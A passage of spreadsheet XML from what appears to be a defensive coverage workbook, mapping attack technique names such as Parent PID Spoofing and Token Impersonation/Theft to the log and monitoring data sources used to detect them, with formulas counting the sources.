        <f>VLOOKUP(A178,'REF-DataSources'!A:B,2)</f>
        <v>Clipboard Data</v>
      </c>
    </row>
    <row r="179" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A179" s="55" t="s">
        <v>226</v>
      </c>
      <c r="B179" s="17" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C179" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D179" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E179" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F179" s="13"/>
      <c r="G179" s="53" t="str">
        <f>VLOOKUP(A179,'REF-DataSources'!A:B,2)</f>
        <v>Automated Collection</v>
      </c>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="53" t="s">
        <v>227</v>
      </c>
      <c r="B180" s="17" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C180" s="17"/>
      <c r="D180" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E180" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F180" s="13"/>
      <c r="G180" s="53" t="str">
        <f>VLOOKUP(A180,'REF-DataSources'!A:B,2)</f>
        <v>Peripheral Device Discovery</v>
      </c>
    </row>
    <row r="181" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A181" s="55" t="s">
        <v>231</v>
      </c>
      <c r="B181" s="17" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C181" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D181" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E181" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F181" s="13"/>
      <c r="G181" s="53" t="str">
        <f>VLOOKUP(A181,'REF-DataSources'!A:B,2)</f>
        <v>Audio Capture</v>
      </c>
    </row>
    <row r="182" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A182" s="55" t="s">
        <v>232</v>
      </c>
      <c r="B182" s="17" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C182" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D182" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E182" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F182" s="13"/>
      <c r="G182" s="53" t="str">
        <f>VLOOKUP(A182,'REF-DataSources'!A:B,2)</f>
        <v>System Time Discovery</v>
      </c>
    </row>
    <row r="183" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A183" s="55" t="s">
        <v>1347</v>
      </c>
      <c r="B183" s="17" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C183" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D183" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E183" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F183" s="13"/>
      <c r="G183" s="53" t="str">
        <f>VLOOKUP(A183,'REF-DataSources'!A:B,2)</f>
        <v>Video Capture</v>
      </c>
    </row>
    <row r="184" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A184" s="55" t="s">
        <v>236</v>
      </c>
      <c r="B184" s="17" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C184" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D184" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E184" s="17">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F184" s="13"/>
      <c r="G184" s="53" t="str">
        <f>VLOOKUP(A184,'REF-DataSources'!A:B,2)</f>
        <v>Trusted Developer Utilities Proxy Execution</v>
      </c>
    </row>
    <row r="185" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A185" s="55" t="s">
        <v>1356</v>
      </c>
      <c r="B185" s="17" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C185" s="17">
        <v>100</v>
      </c>
      <c r="D185" s="17">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="13"/>
      <c r="G185" s="53" t="str">
        <f>VLOOKUP(A185,'REF-DataSources'!A:B,2)</f>
        <v>MSBuild</v>
      </c>
    </row>
    <row r="186" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A186" s="55" t="s">
        <v>238</v>
      </c>
      <c r="B186" s="17" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C186" s="17" t="s">
        <v>239</v>
      </c>
      <c r="D186" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F186" s="13"/>
      <c r="G186" s="53" t="str">
        <f>VLOOKUP(A186,'REF-DataSources'!A:B,2)</f>
        <v>Shared Modules</v>
      </c>
    </row>
    <row r="187" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A187" s="55" t="s">
        <v>242</v>
      </c>
      <c r="B187" s="17" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C187" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D187" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E187" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F187" s="13"/>
      <c r="G187" s="53" t="str">
        <f>VLOOKUP(A187,'REF-DataSources'!A:B,2)</f>
        <v>Data Encoding</v>
      </c>
    </row>
    <row r="188" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A188" s="55" t="s">
        <v>1366</v>
      </c>
      <c r="B188" s="17" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C188" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D188" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F188" s="13"/>
      <c r="G188" s="53" t="str">
        <f>VLOOKUP(A188,'REF-DataSources'!A:B,2)</f>
        <v>Standard Encoding</v>
      </c>
    </row>
    <row r="189" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A189" s="55" t="s">
        <v>1369</v>
      </c>
      <c r="B189" s="17" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C189" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D189" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E189" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F189" s="13"/>
      <c r="G189" s="53" t="str">
        <f>VLOOKUP(A189,'REF-DataSources'!A:B,2)</f>
        <v>Non-Standard Encoding</v>
      </c>
    </row>
    <row r="190" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A190" s="55" t="s">
        <v>243</v>
      </c>
      <c r="B190" s="17" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C190" s="17">
        <v>100</v>
      </c>
      <c r="D190" s="17">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E190" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F190" s="13"/>
      <c r="G190" s="53" t="str">
        <f>VLOOKUP(A190,'REF-DataSources'!A:B,2)</f>
        <v>External Remote Services</v>
      </c>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="53" t="s">
        <v>244</v>
      </c>
      <c r="B191" s="17" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C191" s="17"/>
      <c r="D191" s="17">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E191" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F191" s="13"/>
      <c r="G191" s="53" t="str">
        <f>VLOOKUP(A191,'REF-DataSources'!A:B,2)</f>
        <v>Access Token Manipulation</v>
      </c>
    </row>
    <row r="192" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A192" s="55" t="s">
        <v>1381</v>
      </c>
      <c r="B192" s="17" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Access tokens,API monitoring</v>
      </c>
      <c r="C192" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D192" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E192" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F192" s="13"/>
      <c r="G192" s="53" t="str">
        <f>VLOOKUP(A192,'REF-DataSources'!A:B,2)</f>
        <v>Token Impersonation/Theft</v>
      </c>
    </row>
    <row r="193" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A193" s="55" t="s">
        <v>1387</v>
      </c>
      <c r="B193" s="17" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Access tokens,API monitoring</v>
      </c>
      <c r="C193" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D193" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E193" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F193" s="13"/>
      <c r="G193" s="53" t="str">
        <f>VLOOKUP(A193,'REF-DataSources'!A:B,2)</f>
        <v>Create Process with Token</v>
      </c>
    </row>
    <row r="194" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A194" s="55" t="s">
        <v>1391</v>
      </c>
      <c r="B194" s="17" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Access tokens,API monitoring</v>
      </c>
      <c r="C194" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D194" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E194" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F194" s="13"/>
      <c r="G194" s="53" t="str">
        <f>VLOOKUP(A194,'REF-DataSources'!A:B,2)</f>
        <v>Make and Impersonate Token</v>
      </c>
    </row>
    <row r="195" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A195" s="55" t="s">
        <v>1395</v>
      </c>
      <c r="B195" s="17" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Windows event logs</v>
      </c>
      <c r="C195" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D195" s="17">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E195" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F195" s="13"/>
      <c r="G195" s="53" t="str">
        <f>VLOOKUP(A195,'REF-DataSources'!A:B,2)</f>
        <v>Parent PID Spoofing</v>
      </c>
    </row>
    <row r="196" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A196" s="55" t="s">
        <v>1401</v>
      </c>
      <c r="B196" s="17" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Authentication logs,API monitoring</v>
      </c>
      <c r="C196" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D196" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E196" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F196" s="13"/>
      <c r="G196" s="53" t="str">
        <f>VLOOKUP(A196,'REF-DataSources'!A:B,2)</f>
        <v>SID-History Injection</v>
      </c>
    </row>
    <row r="197" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A197" s="55" t="s">
        <v>245</v>
      </c>
      <c r="B197" s="17" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C197" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D197" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E197" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F197" s="13"/>
      <c r="G197" s="53" t="str">
        <f>VLOOKUP(A197,'REF-DataSources'!A:B,2)</f>
        <v>Network Share Discovery</v>
      </c>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="53" t="s">
        <v>246</v>
      </c>
      <c r="B198" s="17" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C198" s="17"/>
      <c r="D198" s="17">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E198" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F198" s="13"/>
      <c r="G198" s="53" t="str">
        <f>VLOOKUP(A198,'REF-DataSources'!A:B,2)</f>
        <v>Create Account</v>
      </c>
    </row>
    <row r="199" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A199" s="55" t="s">
        <v>1414</v>
      </c>
      <c r="B199" s="17" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D199" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E199" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F199" s="13"/>
      <c r="G199" s="53" t="str">
        <f>VLOOKUP(A199,'REF-DataSources'!A:B,2)</f>
        <v>Local Account</v>
      </c>
    </row>
    <row r="200" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A200" s="55" t="s">
        <v>1418</v>
      </c>
      <c r="B200" s="17" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C200" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D200" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E200" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F200" s="13"/>
      <c r="G200" s="53" t="str">
        <f>VLOOKUP(A200,'REF-DataSources'!A:B,2)</f>
        <v>Domain Account</v>
      </c>
    </row>
    <row r="201" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A201" s="55" t="s">
        <v>1421</v>
      </c>
      <c r="B201" s="17" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C201" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D201" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E201" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F201" s="13"/>
      <c r="G201" s="53" t="str">
        <f>VLOOKUP(A201,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Account</v>
      </c>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="53" t="s">
        <v>248</v>
      </c>
      <c r="B202" s="17" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C202" s="17"/>
      <c r="D202" s="17">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E202" s="17">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F202" s="13"/>
      <c r="G202" s="53" t="str">
        <f>VLOOKUP(A202,'REF-DataSources'!A:B,2)</f>
        <v>Office Application Startup</v>
      </c>
    </row>
    <row r="203" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A203" s="55" t="s">
        <v>1430</v>
      </c>
      <c r="B203" s="17" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D203" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E203" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F203" s="13"/>
      <c r="G203" s="53" t="str">
        <f>VLOOKUP(A203,'REF-DataSources'!A:B,2)</f>
        <v>Office Template Macros</v>
      </c>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="53" t="s">
        <v>1435</v>
      </c>
      <c r="B204" s="17" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Loaded DLLs,Process monitoring,Process command-line parameters,File monitoring,Windows Registry</v>
      </c>
      <c r="C204" s="17"/>
      <c r="D204" s="17">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E204" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F204" s="13"/>
      <c r="G204" s="53" t="str">
        <f>VLOOKUP(A204,'REF-DataSources'!A:B,2)</f>
        <v>Office Test</v>
      </c>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="53" t="s">
        <v>1440</v>
      </c>
      <c r="B205" s="17" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="17"/>
      <c r="D205" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F205" s="13"/>
      <c r="G205" s="53" t="str">
        <f>VLOOKUP(A205,'REF-DataSources'!A:B,2)</f>
        <v>Outlook Forms</v>
      </c>
    </row>
    <row r="206" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A206" s="55" t="s">
        <v>1445</v>
      </c>
      <c r="B206" s="17" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C206" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D206" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E206" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F206" s="13"/>
      <c r="G206" s="53" t="str">
        <f>VLOOKUP(A206,'REF-DataSources'!A:B,2)</f>
        <v>Outlook Home Page</v>
      </c>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="53" t="s">
        <v>1449</v>
      </c>
      <c r="B207" s="17" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C207" s="17"/>
      <c r="D207" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E207" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F207" s="13"/>
      <c r="G207" s="53" t="str">
        <f>VLOOKUP(A207,'REF-DataSources'!A:B,2)</f>
        <v>Outlook Rules</v>
      </c>
    </row>
    <row r="208" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A208" s="55" t="s">
        <v>1452</v>
      </c>
      <c r="B208" s="17" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C208" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D208" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F208" s="13"/>
      <c r="G208" s="53" t="str">
        <f>VLOOKUP(A208,'REF-DataSources'!A:B,2)</f>
        <v>Add-ins</v>
      </c>
    </row>
    <row r="209" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A209" s="55" t="s">
        <v>251</v>
      </c>
      <c r="B209" s="17" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C209" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D209" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E209" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F209" s="13"/>
      <c r="G209" s="53" t="str">
        <f>VLOOKUP(A209,'REF-DataSources'!A:B,2)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
    </row>
    <row r="210" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A210" s="55" t="s">
        <v>262</v>
      </c>
      <c r="B210" s="17" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C210" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D210" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E210" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F210" s="13"/>
      <c r="G210" s="53" t="str">
        <f>VLOOKUP(A210,'REF-DataSources'!A:B,2)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
    </row>
    <row r="211" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A211" s="55" t="s">
        <v>266</v>
      </c>
      <c r="B211" s="17" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C211" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D211" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F211" s="13"/>
      <c r="G211" s="53" t="str">
        <f>VLOOKUP(A211,'REF-DataSources'!A:B,2)</f>
        <v>Source</v>
      </c>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="53" t="s">
        <v>288</v>
      </c>
      <c r="B212" s="17" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C212" s="17"/>
      <c r="D212" s="17">
        <f t="shared" si="7"/>
        <v>8</v>
      </c>
      <c r="E212" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F212" s="13"/>
      <c r="G212" s="53" t="str">
        <f>VLOOKUP(A212,'REF-DataSources'!A:B,2)</f>
        <v>Component Object Model and Distributed COM</v>
      </c>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="53" t="s">
        <v>290</v>
      </c>
      <c r="B213" s="17" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C213" s="17"/>
      <c r="D213" s="17">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E213" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F213" s="13"/>
      <c r="G213" s="53" t="str">
        <f>VLOOKUP(A213,'REF-DataSources'!A:B,2)</f>
        <v>Browser Extensions</v>
      </c>
    </row>
    <row r="214" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A214" s="55" t="s">
        <v>302</v>
      </c>
      <c r="B214" s="17" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C214" s="17" t="s">
        <v>303</v>
      </c>
      <c r="D214" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E214" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F214" s="13"/>
      <c r="G214" s="53" t="str">
        <f>VLOOKUP(A214,'REF-DataSources'!A:B,2)</f>
        <v>Man in the Browser</v>
      </c>
    </row>
    <row r="215" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A215" s="55" t="s">
        <v>305</v>
      </c>
      <c r="B215" s="17" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C215" s="17" t="s">
        <v>306</v>
      </c>
      <c r="D215" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E215" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F215" s="13"/>
      <c r="G215" s="53" t="str">
        <f>VLOOKUP(A215,'REF-DataSources'!A:B,2)</f>
        <v>Forced Authentication</v>
      </c>
    </row>
    <row r="216" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A216" s="55" t="s">
        <v>308</v>
      </c>
      <c r="B216" s="17" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C216" s="17" t="s">
        <v>309</v>
      </c>
      <c r="D216" s="17">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E216" s="17">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="F216" s="13"/>
      <c r="G216" s="53" t="str">
        <f>VLOOKUP(A216,'REF-DataSources'!A:B,2)</f>
        <v>Drive-by Compromise</v>
      </c>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="53" t="s">
        <v>310</v>
      </c>
      <c r="B217" s="17" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C217" s="17"/>
      <c r="D217" s="17">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E217" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F217" s="13"/>
      <c r="G217" s="53" t="str">
        <f>VLOOKUP(A217,'REF-DataSources'!A:B,2)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
    </row>
    <row r="218" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A218" s="55" t="s">
        <v>318</v>
      </c>
      <c r="B218" s="17" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C218" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D218" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E218" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F218" s="13"/>
      <c r="G218" s="53" t="str">
        <f>VLOOKUP(A218,'REF-DataSources'!A:B,2)</f>
        <v>Supply Chain Compromise</v>
      </c>
    </row>
    <row r="219" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A219" s="55" t="s">
        <v>1501</v>
      </c>
      <c r="B219" s="17" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Web proxy</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D219" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E219" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="13"/>
      <c r="G219" s="53" t="str">
        <f>VLOOKUP(A219,'REF-DataSources'!A:B,2)</f>
        <v>Compromise Software Dependencies and Development Tools</v>
      </c>
    </row>
    <row r="220" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A220" s="55" t="s">
        <v>1506</v>
      </c>
      <c r="B220" s="17" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
